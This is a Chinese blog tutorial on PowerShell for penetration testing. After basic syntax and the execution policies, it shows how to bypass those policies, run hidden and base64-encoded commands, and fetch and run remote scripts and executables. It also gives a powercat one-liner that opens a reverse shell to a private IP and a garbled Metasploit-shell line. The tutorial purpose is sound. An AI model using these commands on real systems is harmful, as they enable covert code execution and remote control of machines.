渗透测试中powershell基础

最新推荐文章于 2023-07-21 22:03:13 发布
最新推荐文章于 2023-07-21 22:03:13 发布
阅读量1.1k 收藏 5
点赞数
分类专栏: 内网渗透 文章标签: power shell 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingzhantianxia/article/details/122068458
版权

powershell简介

Windows PowerShell是一种命令行外壳程序和脚本环境,它内置在Windows7及其以上的系统中,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。PowerShell无须写到磁盘中,它可以直接在内存中运行,现在我们讨论的多数都时V2版本的powershell,因为V1的功能对我们来说把不够用,后续版本均向前兼容,所以使用v2即可。

Powershell 基础语法

变量通常以$开头,强类型,但是大小写不敏感

创建数组

$array = 1,2,3,4
$array = 1..4
$array=1,"2017",([System.Guid]::NewGuid()),(get-date)
$a=@()  # 空数组
$a=,"1" # 一个元素的数组

创建哈希表(感觉和类或者C语言的结构体差不多的感觉)

$stu=@{ Name = "test";Age="12";sex="man" }

哈希表的插入和删除

$Student=@{}
$Student.Name="hahaha"
$stu.Remove("Name")

对象

在powershell中一切都可以视为对象,包罗万象New-Object可以创建一个对象Add-Member可以添加属性和方法

其他一些运算符

-eq :等于
-ne :不等于
-gt :大于
-ge :大于等于
-lt :小于
-le :小于等于
-contains :包含
-notcontains :不包含
!($a): 求反
-and :和
-or :或
-xor :异或
-not :逆

循环结构的话与其他语言差别不大

函数结构如下

function Invoke-PortScan {
<#
.SYNOPSIS  简介

.DESCRIPTION  描述
    
.PARAMETER StartAddress 参数

.PARAMETER EndAddress  参数

.EXAMPLE
PS > Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254
用例
#>

code
}
PowerShell策略

powershell 有多种执行策略,若是执行时报错,除了语法之类的错误外,很有可能就能就是策略的问题,powershell有以下6种执行策略

  • Restricted:受限制的,可以执行单个命令,但是不能执行powershell脚本。
  • AllSigned:仅仅允许执行带有数字签名的脚本
  • RemoteSigned:执行从网络下载的脚本时,需要数字签名,本地创建的脚本则可以直接执行,不受限制
  • Unrestrictes:对于本地执行不做限制,网络下载的脚本执行时进行安全提示,让你再次确认。
  • Bypass:执行脚本不做任何限制,对于网络下载的脚本也不做安全提示,无需再次确认。
  • Undefined:表示没有设置策略,会发生继承,或者应用默认的脚本策略。

查看本地策略

Get-ExecutionPolicy

更改策略

Set-ExecutionPolicy

更改powershell的脚本策略需要管理员权限执行,看提示可知,这是对注册表的内容进行更改。

在这里插入图片描述

安全策略绕过

cmd下使用powershell.exe 来执行脚本事可以执行的,无论powershell的执行策略是那种

powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.220.129:8080/hello.ps1')

在这里插入图片描述

下面这种方式也可以,主要就是bypass 策略来执行。

powershell -exec bypass .\hello.ps1

在这里插入图片描述

其他常用命令

ExecvtionPolicy Bypass(-exec bypass):绕过执行安全策略,这个参数非常重要,在默认情况下,PowerShell的安全策略规定了PoweShell不允许运行命令和文件。通过设置这个参数,可以绕过任意一个安全保护规则;
WindowStyle Hidden(-w hidden):隐藏窗口,也就是执行完命令后,窗口隐藏;
-command(-c):执行powershell脚本;
NoProfile(-nop):PowerShell控制台不加载当前用户的配置文件;
NoLogo:启动不显示版权标志的PowerShell;
Nonlnteractive(-noni):非交互模式;
Noexit:执行后不退出shell,这在使用键盘记录等脚本时非常重要;
-enc base64:把ps脚本编码成base64来执行,实战用的最多;

powershell.exe -exec bypass -W hidden -nop  test.ps1

powershell下载文件到指定路径

powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','d:/test.exe');

下载exe,并且执行

powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');start-process test.exe

下载远程powershell 脚本,并且带参数执行

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11 -p 8888 -e cmd

反弹msf的shell

powershell -c IEX (New-Object Net.WebClient).DownloadString('http://xx.xx.xx.xx/7788.ps1');xx.ps1

参考

https://blog.csdn.net/weixin_45116657/article/details/103449931
https://www.anquanke.com/post/id/87976#h3-29

烟雨醉沉浮
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Windows的Powershell下载文件
weixin_33744854的博客
11-02 4160
例如要将文件:http://www.51.cto.com/download/datainfo.cfg                 http://www.51.cto.com/download/ABK/full.ABK                  http://www.51.cto.com/download/FIN/full.FIN                  http://www....
Meteasploit技术
m0_65332604的博客
04-06 2295
在使用Kali操作系统是应注意即使更新源,就像平时及时更新手机APP更新命令如下: apt-get update:只更新软件包的索引源,作用:同步源的软件包的索引信息,从而进行软件更新。 Apt-get upgrade:升级系统上安装的所有软件包,如果失败则保持更新之前的状态。 Apt-get dist-upgrade:升级整个Liunux系统(不仅升级所有已安装的软件包,而且会处理升级过程可能出现的冲突,在某些情况下,他的部分升级需要人工参与)。 渗透攻击大致步骤: *扫描目标及系统,寻找可用
Powershell常用命令(下载、反弹、监听)
墨痕诉清风的博客
02-25 1922
【代码】Powershell常用命令(下载、反弹、监听)
PowerShell使用WebClient 下载文件并获取下载进度
huangxvhui88的专栏
04-17 4356
前言:因为项目的需要,使用了PowerShell脚本下载指定的安装包并进行安装,配置处理,在PowerShell脚本使用了.Net的WebClient进行了文件下载操作,但因为需求问题需要从WebClient获取下载的进度信息,查找了许久,最后经热心网友:Matrix Xu的指点找到了Register-ObjectEvent这个订阅的方法。 以下是个人对订阅事...
Powershell绕过执行及脚本混淆
hl1293348082的专栏
03-28 1224
为什么需要 powershell ?存在必然合理。微软的服务器操作系统因为缺乏一个强大的 Shell 备受诟病。而与之相对,Linux 的 Shell 可谓丰富并且强大。 Windows Server 的 Shell,也就是从 Dos 继承过来的命令行,处理简单问题尚可,一旦遇到稍微复杂一点的问题,它就会把本已复杂的问题,弄得更加复杂。 引入 VBScript,使得 WindowsServer 管理员处理问题的效率提高了不少。但 VBScript 是个脚本语言,即缺乏 Shell 的简单性,也不能.
基于powershell渗透测试工具nishang
AmyBaby00的博客
11-22 608
本文为学习笔记,仅限学习交流。 不得利用、从事危害国家或人民安全、荣誉和利益等活动。 请参阅《华人民共和国网络安全法》 Nishang是一款针对PowerShell的渗透工具。 先到github上去下载nishang,并解压 目标机下载nishang 地址:https://github.com/samratashok/nishang 攻击机下载icmpsh 地址:git clone https:...
【推荐】最新超全的渗透测试学习基础教程集合(84份).zip
08-04
最新超全的渗透测试学习基础教程集合,新手、大佬都可以阅读: 01.入门笔记之看雪Web安全学习及异或解密示例; 02.Chrome浏览器保留密码功能渗透解析及登录加密入门笔记; 03.Burp Suite工具安装配置、Proxy基础用法...
Pentest com POWERSHELL – overview.pdf
最新发布
10-06
描述提到的“网络安全渗透测试漏洞”意味着该文档可能涵盖了利用 PowerShell 找寻、分析和利用系统漏洞的过程。渗透测试的目标是识别潜在的安全弱点,包括未授权访问、信息泄露、权限提升等,以帮助安全团队修复...
nishang:Nishang-用于红队,渗透测试和进攻安全的进攻性PowerShell
02-05
学习和使用Nishang需要对PowerShell有一定的基础,同时也需要理解渗透测试的道德规范和法律法规。在实际操作,确保始终在合法授权和安全环境使用这些工具,避免对他人或组织造成不必要的损害。 通过深入研究...
hack_the_box:渗透测试学习之路
03-12
【描述】的"索引"暗示了这是一个包含一系列教程、指南或者笔记的集合,可能涵盖了从基础到高级的各种渗透测试技术。在Hack The Box平台上,用户会遇到各种不同难度的靶机,通过破解密码、利用漏洞、网络侦察等手段...
PowerShell:NetSPI PowerShell脚本
05-13
NetSPI是一家知名的网络安全服务提供商,他们的脚本通常涉及安全审计、漏洞检测和渗透测试。这些脚本可能包含了用于检测系统安全性的各种功能,如枚举用户、权限检查、网络扫描、日志分析等。 在PowerShell,脚本...
PowerShell使用
weixin_44110913的博客
08-02 2095
目录 Windows PowerShell PowerShell的执行策略 绕过执行策略执行PowerShell脚本 PowerShell的常用文件类命令 PowerShell远程下载文件并执行 渗透测试常用的PowerShell命令 Powershell导入文件  Windows PowerShell Windows PowerShell是一种命令行外壳程序和脚本环境,它内置在Windows7及其以上的系统...
windows 使用powershell自带的工具(如wget,WebClient等)下载文件
noblaker的博客
04-12 1万+
系统:win10 powershell 版本:5.1(在终端用$psversiontable查看) windows的powershell也有跟linux同名的wget文件下载工具,只不过powershell的wget是Invoke-WebRequest命令的别名: # 利用get-alias命令: PS D:\> Get-Alias wget # 输出: CommandType Name Ve.
PowerShell常用命令及使用方法
热门推荐
Captain_RB的博客
06-17 5万+
PowerShell 依托.NET Framework平台可以实现非常强大的功能,而且普适性强,Win7及以上系统自带,隐蔽性好,可以直接在内存运行,能够绕过部分杀软,现将平日操作及内网渗透过程常用命令及使用方法总结如下。...
powershell -enc参数无法解码base64编码payload的解决方案
weixin_30298497的博客
07-06 2578
powershell的-enc参数允许传入一个base64编码过的powershell脚本字符串作为参数来执行该powershell脚本,该方法常被用于绕过杀毒软件的主动防御机制。 今天下午在做一个后门程序时,通过在线base64编码网站编码的字符串竟然没法被powershell的-enc参数解析,解析时全是乱码,通过查找资料终于解决了这个问题 故将这个问题记录下来以备后续使用 方法引用自:...
webclient无法获取html文件,Webclient.DownloadFile().aspx文件无法打开(Webclient.Down
weixin_31937913的博客
06-10 450
我使用PowerShell首次。 我已经学会了如何使用Web客户端,使用下面的代码来下载文件。$client = New-Object System.NET.Webclient$client.DownloadFile( $url, $path )这似乎很好地为我所试图做的,最终,这是一次从网页下载多个文件。 我想这在网站上,有其格式化为.pfva文件,这些文件被打开的PDF文件。 没问题。 ...
powershell命令语句混淆免杀(bypass火绒)
weixin_43899495的博客
02-04 1250
基础混淆 原始语句(不免杀) powershell “IEX (New-Object System.Net.WebClient).DownloadString(‘http://127.0.0.1/a.ps1’)" AV:火绒 混淆测试 New-Object System.Net 类可以直接替换成 New-Object Net 类(不免杀) powershell "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/a.ps1')"
windows 弹shell_Windows文件下载执行的15种姿势
weixin_39706127的博客
11-19 293
当我们通过Web渗透获取了一个Shell,而且目标主机是Windows,我们该怎么去下载后门文件到目标主机上执行呢?一般来说,实现Windows文件下载执行的方式不外乎以下几种方式。第一种,远程下载文件到本地,然后再执行;第二种,远程下载执行,执行过程没有二进制文件落地,这种方式已然成为后门文件下载执行的首要方式。另外呢,只要你所在服务器的环境支持,你也可以通过任何一门语言来实现它,这种...
2023 Windows powershell 下载web网页资源文件方法
Woo_dy的博客
07-21 1623
有时候打开资源过大网页/下载数据集的时候会遇到一些问题,如(https://storage.googleapis.com/sfr-vision-language-research/BLIP/datasets/laion_synthetic_filtered_large.json)这个网页是salesforce blip的公开数据集,其json文件资源过大,缓存不下来,根据在清华源浏览时的经验,估计就算缓存下来也无法查看。
渗透测试指南:实战技巧与合规评估
4. 渗透测试工具的使用:这一部分着重于实操训练,通过实例演示如何熟练运用Bash、Python、Ruby和PowerShell等编程语言,进行信息收集和自动化脚本编写。考生将通过这些工具提升自己的信息分析能力和基础编程技巧。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值